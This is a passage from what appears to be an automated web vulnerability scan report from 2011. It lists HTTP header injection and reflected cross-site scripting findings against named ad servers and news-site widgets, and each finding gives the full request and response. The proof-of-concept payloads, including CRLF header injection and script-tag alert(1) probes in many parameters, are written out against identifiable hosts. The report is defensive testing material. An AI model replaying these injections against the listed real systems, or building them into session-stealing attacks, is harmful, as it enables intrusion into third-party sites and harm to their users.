User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:18:20 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 22-Sep-2079 14:32:27 GMT
Location: http://optout.crwdcntrl.net/optout?d=http://optout.crwdcntrl.net/optout/check.php?src=naioo&5c587
a6834fe02bc
=1&ct=Y
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


5.21. http://t.mookie1.com/t/v1/event [migDest parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /t/v1/event

Issue detail

The value of the migDest request parameter is copied into the Location response header. The payload 46c19%0d%0ac678bd8e895 was submitted in the migDest parameter. This caused a response containing an injected HTTP header.

Request

GET /t/v1/event?migClientId=2451&migAction=ibehavior_tidal&migSource=mig&migDest=http%3A%2F%2Fuav.tidaltv.com%2F3PDPHandler.aspx%3Ftpdp%3D25%26app%3D3%26segs%3D46c19%0d%0ac678bd8e895&vid=0 HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; id=4612741554684080402; mdata=1|4612741554684080402|1315103146

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 03:24:04 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914807826538115; path=/; expires=Wed, 03-Oct-12 03:24:04 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=1|914807826538115|1315106598; path=/; expires=Wed, 03-Oct-12 03:24:04 GMT; path=/; domain=.mookie1.com
Location: http://uav.tidaltv.com/3PDPHandler.aspx?tpdp=25&app=3&segs=46c19
c678bd8e895

Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


6. Cross-site scripting (reflected)  previous  next
There are 231 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


6.1. http://223.165.24.159/toiwidget/jsp/widget.jsp [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://223.165.24.159
Path:   /toiwidget/jsp/widget.jsp

Issue detail

The value of the city request parameter is copied into the HTML document as plain text between tags. The payload 645c6<script>alert(1)</script>bc6a95ad9f1 was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toiwidget/jsp/widget.jsp?city=Mumbai645c6<script>alert(1)</script>bc6a95ad9f1 HTTP/1.1
Host: 223.165.24.159
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:28 GMT
Server: Apache/2.2.16 (Unix) DAV/2 PHP/5.2.14 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 11324


    <link href="../css/style.css" rel="stylesheet" type="text/css" /><div class="box">    <h2>        <div class="fl" id="cityId"></div>                <div class="fr" style="width:85px; text-align:right; mar
...[SNIP]...
<div class="fl">Properties in Mumbai645c6<script>alert(1)</script>bc6a95ad9f1 </div>
...[SNIP]...

6.2. http://223.165.24.159/toiwidget/jsp/widget.jsp [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://223.165.24.159
Path:   /toiwidget/jsp/widget.jsp

Issue detail

The value of the city request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 953b0'%3balert(1)//e676851dc41 was submitted in the city parameter. This input was echoed as 953b0';alert(1)//e676851dc41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /toiwidget/jsp/widget.jsp?city=Mumbai953b0'%3balert(1)//e676851dc41 HTTP/1.1
Host: 223.165.24.159
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:25 GMT
Server: Apache/2.2.16 (Unix) DAV/2 PHP/5.2.14 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 11223


    <link href="../css/style.css" rel="stylesheet" type="text/css" /><div class="box">    <h2>        <div class="fl" id="cityId"></div>                <div class="fr" style="width:85px; text-align:right; mar
...[SNIP]...
<script type="text/javascript">    
var city='Mumbai953b0';alert(1)//e676851dc41';    
var originalCity    =    city;    
var casechanged    =    city.toLowerCase();    
var lengthCount    =    0;    
if(casechanged == 'Thiruvananthapuram')        
   city    =    'Thiru\'puram';    city = 'Jobs in '+city;    
lengthCount    =
...[SNIP]...

6.3. http://ad4.liverail.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ad4.liverail.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e51a9<a>bf5706f66a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?e51a9<a>bf5706f66a9=1 HTTP/1.1
Host: ad4.liverail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 29 May 1984 15:00:00 GMT
Content-type: text/xml; charset=UTF-8
Connection: close
Date: Sun, 04 Sep 2011 04:06:38 GMT
Server: lighttpd/1.4.28
Content-Length: 181

<?xml version="1.0" encoding="utf-8"?>
<liverail content='error' version='3.0-10.166.49.10'><message>Publisher ID missing (/1//10.166.49.10/e51a9<a>bf5706f66a9)</message></liverail>

6.4. http://addoer.com/showfixads.php [tabname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addoer.com
Path:   /showfixads.php

Issue detail

The value of the tabname request parameter is copied into a JavaScript rest-of-line comment. The payload dbb87%0aalert(1)//1a736eeaaa3 was submitted in the tabname parameter. This input was echoed as dbb87
alert(1)//1a736eeaaa3
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /showfixads.php?tabname=c0002761dbb87%0aalert(1)//1a736eeaaa3&frame=yes HTTP/1.1
Host: addoer.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 02:25:16 GMT
Server: Sun Java System
Content-Length: 135

get domain from : http://paidoo.net/get_dom.php?tabname=c0002761dbb87
alert(1)//1a736eeaaa3
&code=d835fd240569ce2847976e38e40e427d<br />

6.5. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee597"-alert(1)-"d76410964e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409&ee597"-alert(1)-"d76410964e=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:42:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 02:42:52 GMT
Pragma: no-cache
Content-Length: 4667
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&ee597"-alert(1)-"d76410964e=1&s=2377409&_salt=2521144252";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

6.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba69c"><script>alert(1)</script>d6cde2c0778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409&ba69c"><script>alert(1)</script>d6cde2c0778=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:42:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 02:42:52 GMT
Pragma: no-cache
Content-Length: 4715
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?Z=1x1&ba69c"><script>alert(1)</script>d6cde2c0778=1&s=2377409&_salt=2400931217&t=2" target="_parent">
...[SNIP]...

6.7. http://ads3.bangkokpost.co.th/www/delivery/spc.php [zones parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads3.bangkokpost.co.th
Path:   /www/delivery/spc.php

Issue detail

The value of the zones request parameter is copied into the HTML document as plain text between tags. The payload c8036<script>alert(1)</script>e65cf74873f was submitted in the zones parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www/delivery/spc.php?zones=120%3D120%7C127%3D127%7C170%3D170%7Cc8036<script>alert(1)</script>e65cf74873f&nz=1&source=&r=29318038&charset=UTF-8&loc=http%3A//www.bangkokpost.com/&referer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok+thailand+news HTTP/1.1
Host: ads3.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:49 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:49 GMT; path=/
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:49 GMT; path=/
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:49 GMT; path=/
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:49 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Content-Size: 1967
Vary: User-Agent,Accept-Encoding
Content-Length: 1967
Content-Type: application/x-javascript; charset=UTF-8

OA_output['120'] = '';

OA_output['127'] = '';

OA_output['170'] = '';

OA_output['c8036<script>alert(1)</script>e65cf74873f'] = '';
OA_output['c8036<script>alert(1)</script>e65cf74873f'] += "<"+"div
...[SNIP]...

6.8. http://ads4.bangkokpost.co.th/ads_server/iframe [FONT_COLOR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads4.bangkokpost.co.th
Path:   /ads_server/iframe

Issue detail

The value of the FONT_COLOR request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb396'><script>alert(1)</script>87fd94cf478 was submitted in the FONT_COLOR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ads_server/iframe?&SITE=WEBDIRECTORY&AREA=SPONSOR_C&TYPE=SPONSOR+LINKS&POSITION=POSITION+A&METHOD=IFRAME&CATEGORY=BUSINESS&KEYWORD=&FONT_COLOR=ED7007eb396'><script>alert(1)</script>87fd94cf478&ACC_RANDOM=853121136? HTTP/1.1
Host: ads4.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:56:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 1326
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="t
...[SNIP]...
<h3 class="header" style='color:#ED7007eb396'><script>alert(1)</script>87fd94cf478'>
...[SNIP]...

6.9. http://ads4.bangkokpost.co.th/ads_server/iframe/ [FONT_COLOR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads4.bangkokpost.co.th
Path:   /ads_server/iframe/

Issue detail

The value of the FONT_COLOR request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 24c70'><script>alert(1)</script>60e7c2a3a40 was submitted in the FONT_COLOR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads_server/iframe/?&SITE=WEBDIRECTORY&AREA=SPONSOR_C&TYPE=SPONSOR+LINKS&POSITION=POSITION+D&METHOD=IFRAME&CATEGORY=BUSINESS&KEYWORD=&FONT_COLOR=ED700724c70'><script>alert(1)</script>60e7c2a3a40&ACC_RANDOM=646920734? HTTP/1.1
Host: ads4.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:56:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 1304
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="t
...[SNIP]...
<h3 class="header" style='color:#ED700724c70'><script>alert(1)</script>60e7c2a3a40'>
...[SNIP]...

6.10. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5132/1305477/0/170/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 861bb'-alert(1)-'f21fb08044c was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5132/1305477/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=0.02706600772216916;misc=1315103192573;rdclick=http://yads.zedo.com/ads2/c%3Fa=789954%3Bn=767%3Bx=2304%3Bc=767000004,767000004%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bk=861bb'-alert(1)-'f21fb08044c HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 531

document.write('<a href="http://yads.zedo.com/ads2/c%3Fa=789954%3Bn=767%3Bx=2304%3Bc=767000004,767000004%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bk=861bb'-alert(1)-'f21fb08044chttp://adserver.adtechus.com/?adlink/5132/1305477/0/170/AdId=-3;BnId=0;itime=104221538;sub1=javascript;sub2=noauto;" target=_blank>
...[SNIP]...

6.11. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5132/1305477/0/170/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 480d2'-alert(1)-'10715eeaf55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5132/1305477/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=0.02706600772216916;misc=1315103192573;rdclick=http://yads.zedo.com/ads2/c%3Fa=789954%3Bn=767%3Bx=2304%3Bc=767000004,767000004%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bk=&480d2'-alert(1)-'10715eeaf55=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 534

document.write('<a href="http://yads.zedo.com/ads2/c%3Fa=789954%3Bn=767%3Bx=2304%3Bc=767000004,767000004%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bk=&480d2'-alert(1)-'10715eeaf55=1http://adserver.adtechus.com/?adlink/5132/1305477/0/170/AdId=-3;BnId=0;itime=104222794;sub1=javascript;sub2=noauto;" target=_blank>
...[SNIP]...

6.12. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adrawdata/3.0/5108.1/1446938/0/0/ADTECH

Issue detail

The value of the kvinvtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a5f1"><script>alert(1)</script>a3c894894fe was submitted in the kvinvtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adrawdata/3.0/5108.1/1446938/0/0/ADTECH;kvinvtype=display;kvrid=1323243821bd3a2334d85d82f0661701;kvexpandable=1;kvdim=twig;kvbw=0;kvpid=1446938;kvgm=100;kva2534=100;kva2544=100;kva1834=100;kvagt18=100;kvagt25=100;kvagt35=1002a5f1"><script>alert(1)</script>a3c894894fe HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 8844

<!-- 00.00000 -->
<adFrames version="2.1" type="adFramesV2" ccid="1816855-1" rev="12033:12037MP" path="invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=100;a2534=100;a2544=100;a1834=100;agt18=100;agt25=100;agt35=1002a5f1"><script>alert(1)</script>a3c894894fe" invitationimp="http://adserver.adtechus.com/adcount/3.0/5108/1446938/0/16/AdId=1816855;BnId=1;ct=3889831121;st=911;adcid=1;itime=105695701;reqtype=25;;kr9570=173114;kp=101725" takeoverimp="http://ads
...[SNIP]...

6.13. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adrawdata/3.0/5108.1/1446938/0/0/ADTECH

Issue detail

